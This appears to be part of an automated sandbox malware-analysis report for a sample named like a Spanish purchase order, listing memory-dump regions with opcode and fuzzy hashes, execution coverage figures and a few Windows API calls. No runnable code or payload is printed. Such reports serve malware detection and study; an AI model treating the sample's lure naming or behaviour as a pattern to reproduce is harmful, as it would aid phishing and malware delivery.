                                          • Opcode ID: 377ffef20263e8e5ea3c8d6740e072ca8a02077f7979e3e75a2762d0b67499b1
                                          • Instruction ID: 70ef67a5fe36fc18a88ecd0a8a6c8293b02ef6cc45fe7d0ac9bc4f84ac04197d
                                          • Opcode Fuzzy Hash: 377ffef20263e8e5ea3c8d6740e072ca8a02077f7979e3e75a2762d0b67499b1
                                          • Instruction Fuzzy Hash: 66713AB0A002199FDB54EFA9D980AADBBF6FF84340F248569D405EB354DB30EC46CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a33f61ef99f13a774fc3703eae506a497c7fd70a6df576b6f281c138204be33a
                                          • Instruction ID: ee160082237a2a8d8525427ad6330c08f64a6c7423598b664347585b43f666ad
                                          • Opcode Fuzzy Hash: a33f61ef99f13a774fc3703eae506a497c7fd70a6df576b6f281c138204be33a
                                          • Instruction Fuzzy Hash: 2D618070F002199FEF54AFA9C8547AEBBF6FB88700F208469D506AB394DE758C45CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08311386dfb0fde96b88f2bc23606e6afde315ca639bfd21c8bc6802bc6bf2bd
                                          • Instruction ID: 1b092fee2832054ecd944b2d92bee74d8f441bd3ef134abaa969d320d94827cc
                                          • Opcode Fuzzy Hash: 08311386dfb0fde96b88f2bc23606e6afde315ca639bfd21c8bc6802bc6bf2bd
                                          • Instruction Fuzzy Hash: D551F571E01109DFCF54FBB8E4846BEB7B6EF85351F1048A9E206D7251DB359846C780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 70ca684ba9cf088e8be3d8327af8d6bdc33d6e68a460e5bc5b7536c0fa0d640b
                                          • Instruction ID: f744fdd1879a7445eef15d77c5e62acab352499823a7ffb3c1f7342937e5b21e
                                          • Opcode Fuzzy Hash: 70ca684ba9cf088e8be3d8327af8d6bdc33d6e68a460e5bc5b7536c0fa0d640b
                                          • Instruction Fuzzy Hash: AA5194B0F102148FEF6466F8D85477F3A5EDBC9390F205669E50AC7396CA69CC41C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 774eae68589be9d4be2572b0d5320f9ccc6b9474fd0f836322f3572a5638beb7
                                          • Instruction ID: f064b1fafa705fd609907d8a3b327b18cde0c0f24976147d7e8ea1121cf28c7d
                                          • Opcode Fuzzy Hash: 774eae68589be9d4be2572b0d5320f9ccc6b9474fd0f836322f3572a5638beb7
                                          • Instruction Fuzzy Hash: F1510D70B011169FEB54EF69D950B6EB7F6EB89600F108569D80AEF384EB35DC42CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1e0c1a20e9870844aa7130ad6187194f707733658b66c490a3dee0d8d9974726
                                          • Instruction ID: affe3d6ca16715f91ef985a0b7c058914a212a5acd7ac5db25bdc4f258f2aa78
                                          • Opcode Fuzzy Hash: 1e0c1a20e9870844aa7130ad6187194f707733658b66c490a3dee0d8d9974726
                                          • Instruction Fuzzy Hash: 95518070B102188BEF64B6F8D85473F395ED7C9390F205669E50AC3396CA69CC41C7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 57326cffa85bae14898fdf04a94565bfb292550cb948257abba639d045935330
                                          • Instruction ID: 3441d3b292c859387c1f8217704d981d94433c4e958ae71286cc11cdd4b37167
                                          • Opcode Fuzzy Hash: 57326cffa85bae14898fdf04a94565bfb292550cb948257abba639d045935330
                                          • Instruction Fuzzy Hash: 29418F70B002199FDB54AFA9C854BAEBBF6FF88700F208529E505AB395DE719C05CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4574223e243f44522a66fdcd6aadf976eb0ab21a93f69d6dabb0799189ce2e95
                                          • Instruction ID: ee1e70160cd3fd5aae8c76f97ae6db8c0beee02aaf4462e870dc4920c0f810ea
                                          • Opcode Fuzzy Hash: 4574223e243f44522a66fdcd6aadf976eb0ab21a93f69d6dabb0799189ce2e95
                                          • Instruction Fuzzy Hash: A4417DB2E006099FDFB0DFA9D880BAFBBB2EB84310F14496AD255D7604D330E855CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 111a8b0ae0d08197287fbb5ccc3eba7ee773b8c4ec28683b8a6b64d3c553a64d
                                          • Instruction ID: 2aa5d60bdfbdbbfd3e4517608f52213989136d62162fecbe7aefa6603e3a7793
                                          • Opcode Fuzzy Hash: 111a8b0ae0d08197287fbb5ccc3eba7ee773b8c4ec28683b8a6b64d3c553a64d
                                          • Instruction Fuzzy Hash: 6E4191B0E0020ADFDB55EF75C4446AEBBB2FF85340F20456AE401EB281DBB19846CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 125aa8808d7599c4e2bc102950ae6fae906e37b4e00afc9e65d98a83a5bdea54
                                          • Instruction ID: fc3e702d3cd041df458c108bb20aa0a65b33979361840906c1e43fd5f4a9c521
                                          • Opcode Fuzzy Hash: 125aa8808d7599c4e2bc102950ae6fae906e37b4e00afc9e65d98a83a5bdea54
                                          • Instruction Fuzzy Hash: F2319A70B002068FDB58BB75D91466F7BA2EB89600F648568D406DB388EF39DD02CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 193927f4eeea20fb46ff296e6f2d4d6ffe69c6a9e6c46350b61c0b54affe43e8
                                          • Instruction ID: dd8d77d732c6df632537d6ee8838c294bcf2b049bc71fe3e0c54802c74cbd94f
                                          • Opcode Fuzzy Hash: 193927f4eeea20fb46ff296e6f2d4d6ffe69c6a9e6c46350b61c0b54affe43e8
                                          • Instruction Fuzzy Hash: F3318070E10216DFDB59EFA5D89469EB7B2FF89300F208529E906E7350DB71AD42CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf8b5d16d68c840a88f0c1230940f9fd5f433bcc14c7e0feb5b748cefd7efea7
                                          • Instruction ID: 3f55452c8a9126cc337c58a240af74d8a6f912686a6d0d3148acea8ece009116
                                          • Opcode Fuzzy Hash: cf8b5d16d68c840a88f0c1230940f9fd5f433bcc14c7e0feb5b748cefd7efea7
                                          • Instruction Fuzzy Hash: 55318170E10216DFDB59EFA4D85469EB7B2FF89300F208519E906E7350DB71AD42CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 112d6990b71b5481fdec30dd38ecb8288020c2012823ea3b9f112c7a48e09184
                                          • Instruction ID: 7c9290e33de06624840d2e680a1c4e68ca985e653c7a684ba6280eadc88bdc94
                                          • Opcode Fuzzy Hash: 112d6990b71b5481fdec30dd38ecb8288020c2012823ea3b9f112c7a48e09184
                                          • Instruction Fuzzy Hash: 4A217FB1F112159FDB50EFA9E840AAEBBF6EB48710F104165E905E7380D731D851CBE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a58d144188a4137948d28c6fa62f20a602286db884c9199d094a10e11805e64
                                          • Instruction ID: b7d1ec4d042a3be7e76e35b8dcbed3daeb20543ad5dde5400083c7a920e20c16
                                          • Opcode Fuzzy Hash: 6a58d144188a4137948d28c6fa62f20a602286db884c9199d094a10e11805e64
                                          • Instruction Fuzzy Hash: 76219DB5F112159FDB40EFA9E880AAEBBF5EB88710F108165E905EB380E731DC50CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4528843260.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_139d000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3d6de60cb88187310cca6f38e863ba44fb9bceb0fa00a113a7ba2cffd7a5b82
                                          • Instruction ID: 9daaa6ae1525b37fc5ada3c46277d92f936defb9354cf846ebb20991908aa14f
                                          • Opcode Fuzzy Hash: b3d6de60cb88187310cca6f38e863ba44fb9bceb0fa00a113a7ba2cffd7a5b82
                                          • Instruction Fuzzy Hash: 6C2134B6504308EFDF15CF68C9C1B26BB65FB84318F20C56DE90A0B352C77AD846CA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b3dc4fc138a346d9f9c6bba50faba9e8c4f52cf98b2ae2914d065087d449d05
                                          • Instruction ID: 4523dad343091cc8b24091d9eda5b1162e0ceaf57170a4184d60b42d02bdb12a
                                          • Opcode Fuzzy Hash: 0b3dc4fc138a346d9f9c6bba50faba9e8c4f52cf98b2ae2914d065087d449d05
                                          • Instruction Fuzzy Hash: 6D118E31B1012A8FDB44EA69D8106AF73E6EBC9611B008579D906E7384EE66DC01CBD6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 62053e8be8d5712df0feadf0048d35ec8716d1b33b98fcd46683ae5b1b6ea45a
                                          • Instruction ID: de3efc52b6ec3f4930ca952804c9d2c3b7cdafd7b7a26ffbcca87d86305e8b05
                                          • Opcode Fuzzy Hash: 62053e8be8d5712df0feadf0048d35ec8716d1b33b98fcd46683ae5b1b6ea45a
                                          • Instruction Fuzzy Hash: 9F01D271F141620FDB65AABD9410B6FB7D6DBC6610F14896AD40AC7781D959CC02C390
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a8b835b987e97ab333862529cb91caef86ea9911100327de9112bdbba2eeb6b
                                          • Instruction ID: a97eaa1332c9f25e789cfbbc5b7219b3b92bdda4837c886ad48c424a388b0122
                                          • Opcode Fuzzy Hash: 8a8b835b987e97ab333862529cb91caef86ea9911100327de9112bdbba2eeb6b
                                          • Instruction Fuzzy Hash: FE01B175B001919FDB61EABC9840B3F77DAEBC9750F148469F50ACB340DA6ADC028791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63cc60426fa61f6c3e57c5cdd69df1d1f23d09f7eae71a1d4156af2edcd67a82
                                          • Instruction ID: 9eeda902cb7707b47c07d68744b00fa613fb3cf7706f9c014efdcf02519eddc8
                                          • Opcode Fuzzy Hash: 63cc60426fa61f6c3e57c5cdd69df1d1f23d09f7eae71a1d4156af2edcd67a82
                                          • Instruction Fuzzy Hash: 0801F7B0B102214FDB65E67DE860B2F77D6EB86710F10986AE00ADB791EA15DC42C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c433ac8c65f6e04fd8fbb5f879378c49dccf6f9ff9bacfdf95d88ecdac277e39
                                          • Instruction ID: 36f3048a2929c4351263c7fbb6ff1e3dd1a03168997eb1d5df5865ecf9380f82
                                          • Opcode Fuzzy Hash: c433ac8c65f6e04fd8fbb5f879378c49dccf6f9ff9bacfdf95d88ecdac277e39
                                          • Instruction Fuzzy Hash: 5C21B2B5D01259AFDB00DF9AD884A8EFBB8FB49620F50816AE518B7200C7746554CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4528843260.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_139d000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                          • Instruction ID: eec93a2f9fcced5a429b7549ea49a890769973b22bb4b994799216f187d6db5c
                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                          • Instruction Fuzzy Hash: 6111DDB6504284CFCB12CF58C9C4B16BFA2FB84318F24C6A9D8494B352C33AD44ACF62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7a739ec4c58be466be953da33dd2f1fe6ab53e4a5d1acdf926cfcdc8c0533bdb
                                          • Instruction ID: 858af4d43d4915a7540f7a451a8cc04433816f986bb4ae5c9a9b52b9bbdb8f61
                                          • Opcode Fuzzy Hash: 7a739ec4c58be466be953da33dd2f1fe6ab53e4a5d1acdf926cfcdc8c0533bdb
                                          • Instruction Fuzzy Hash: 7801DF32B101264BDB84A969DC107AF77EBEBC9610F004979E90AE7384EF61CC12C7D6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac9a39021cacb166a8b0d8989d0f259259d6841051aa864c48cae59c42686719
                                          • Instruction ID: 3da3683c7ced0b5bc7cb23b9512d54260bedb511494358a58d17733320865335
                                          • Opcode Fuzzy Hash: ac9a39021cacb166a8b0d8989d0f259259d6841051aa864c48cae59c42686719
                                          • Instruction Fuzzy Hash: 3811C0B5D01259AFDB00DF9AD884A8EFBB4FB48620F50812AE518A7200C374A554CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c52c754a82c77373649d55e415d208a59666f573e7e265d74311414c9e858dc
                                          • Instruction ID: 393b5ea991b28805b4576d81cefebbe7f5322e8df52edea62ac637bfe5a8c245
                                          • Opcode Fuzzy Hash: 6c52c754a82c77373649d55e415d208a59666f573e7e265d74311414c9e858dc
                                          • Instruction Fuzzy Hash: 34016271B241224FDB64EAAD9410B2FB3DADBC5610F209979E50EC7784DD69DC02C395
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 355e5a0e1566ad247cbc8e3c019eb3c584dd729f04d506399de7201ecfb9651d
                                          • Instruction ID: 5d65f6c786fc4db4c1628fbd011f5d913853d2ec07616f58ca1364f4225955b6
                                          • Opcode Fuzzy Hash: 355e5a0e1566ad247cbc8e3c019eb3c584dd729f04d506399de7201ecfb9651d
                                          • Instruction Fuzzy Hash: 86016D75B001568FDB64FAAD9450B3FB3DAEBC9B60F109869F50AC7340DA69DC028791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c668d34668dd5de5c414aa150cbb64ba61aed4b0ec216cfea64778c69d2928f
                                          • Instruction ID: 2f83e884ebbdac341b15f11c18228ed63d40c238f611f7971e0a28b72a11652f
                                          • Opcode Fuzzy Hash: 1c668d34668dd5de5c414aa150cbb64ba61aed4b0ec216cfea64778c69d2928f
                                          • Instruction Fuzzy Hash: A5018170B102214FDB64E66DE454B2F73D6DB8A620F109969E10ADB780EA25EC42C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9c9748471d41db29d6c99e849f5490b4f0ca06686a3b5a3313113d2803fc385
                                          • Instruction ID: 82a513ec141708e459218ca412d5803b3ab6e9fd2e52e41e906c622574bbd64e
                                          • Opcode Fuzzy Hash: a9c9748471d41db29d6c99e849f5490b4f0ca06686a3b5a3313113d2803fc385
                                          • Instruction Fuzzy Hash: 5BF0A772E212349BDB14AA66EC006AAB73AF784350F104579D901E7244D771AC04CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 789047fea4f312023ce40c11fa64f57bf12a26e2bdfeaf2abba061b92660105e
                                          • Instruction ID: 668c5f5b0d290ff1ad0daa58d6ee585f0c565de16b405b1471cb365fffc2892b
                                          • Opcode Fuzzy Hash: 789047fea4f312023ce40c11fa64f57bf12a26e2bdfeaf2abba061b92660105e
                                          • Instruction Fuzzy Hash: 86F08CB6E10124CFDF74BA45EA402ACB7B5FB41312F9844E2E901EB194C331DE82DB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c5c2811b310dbd8062bed3da226252396b07e9eefbf85f980d6c144ab2c6a28
                                          • Instruction ID: c8d93222a26183f60c49a9a48c911f92fe0c12635256c16b2b4bb910aafb64e6
                                          • Opcode Fuzzy Hash: 3c5c2811b310dbd8062bed3da226252396b07e9eefbf85f980d6c144ab2c6a28
                                          • Instruction Fuzzy Hash: 66E092F1E182486FEB50DAB4D90575F7BADD742214F1445E5D404DB282F236CD41C351
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:10.8%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:197
                                          Total number of Limit Nodes:9

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: D
                                          • API String ID: 0-2746444292
                                          • Opcode ID: 77df2d228825f2494ec75644b5cd1959e0e42b9b369647b0f448cd5692437a28
                                          • Instruction ID: 30306b4769ef857704fe599818324f0606930d61c29bb183afabf6495ec96e3c
                                          • Opcode Fuzzy Hash: 77df2d228825f2494ec75644b5cd1959e0e42b9b369647b0f448cd5692437a28
                                          • Instruction Fuzzy Hash: C652C574A00218DFDB68DF64D998A9DBBB6FF89300F1041D9D509AB365CB35AE81CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f2db41af880a0335988ce99a00269c4447b35b0216d4237180c27caababd2121
                                          • Instruction ID: 5d5dc2ab254009816195dfca6a6514f2d501bad957dca14630c2e9445bac5133
                                          • Opcode Fuzzy Hash: f2db41af880a0335988ce99a00269c4447b35b0216d4237180c27caababd2121
                                          • Instruction Fuzzy Hash: 36B2C075E00628DFDB64CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c05dddd8187913f610598884af95919bcd863abab6b592a339662897a992f6bc
                                          • Instruction ID: 1f67706e6743e77b6bd660bdb7e3915a280309fd2aa34b2b958e2f164c390565
                                          • Opcode Fuzzy Hash: c05dddd8187913f610598884af95919bcd863abab6b592a339662897a992f6bc
                                          • Instruction Fuzzy Hash: 4761E6B5E0021C9FDB48DFEAD844AEEBBB6FF89300F148029E519AB254DB745946CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00F9D07E
                                          • GetCurrentThread.KERNEL32 ref: 00F9D0BB
                                          • GetCurrentProcess.KERNEL32 ref: 00F9D0F8
                                          • GetCurrentThreadId.KERNEL32 ref: 00F9D151
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: d568b10b4cdb4814c9e1220f4df1a4374cec603f4980558bd5564c3df4c77f41
                                          • Instruction ID: 476f4d12bc673e015ab64fdf495dc4782436200334d9eb8be0f85bb4400e7757
                                          • Opcode Fuzzy Hash: d568b10b4cdb4814c9e1220f4df1a4374cec603f4980558bd5564c3df4c77f41
                                          • Instruction Fuzzy Hash: 385166B1D00349CFEB14CFA9D548B9EBBF1AF88314F208459E409A73A1DBB55984CB66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00F9D07E
                                          • GetCurrentThread.KERNEL32 ref: 00F9D0BB
                                          • GetCurrentProcess.KERNEL32 ref: 00F9D0F8
                                          • GetCurrentThreadId.KERNEL32 ref: 00F9D151
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
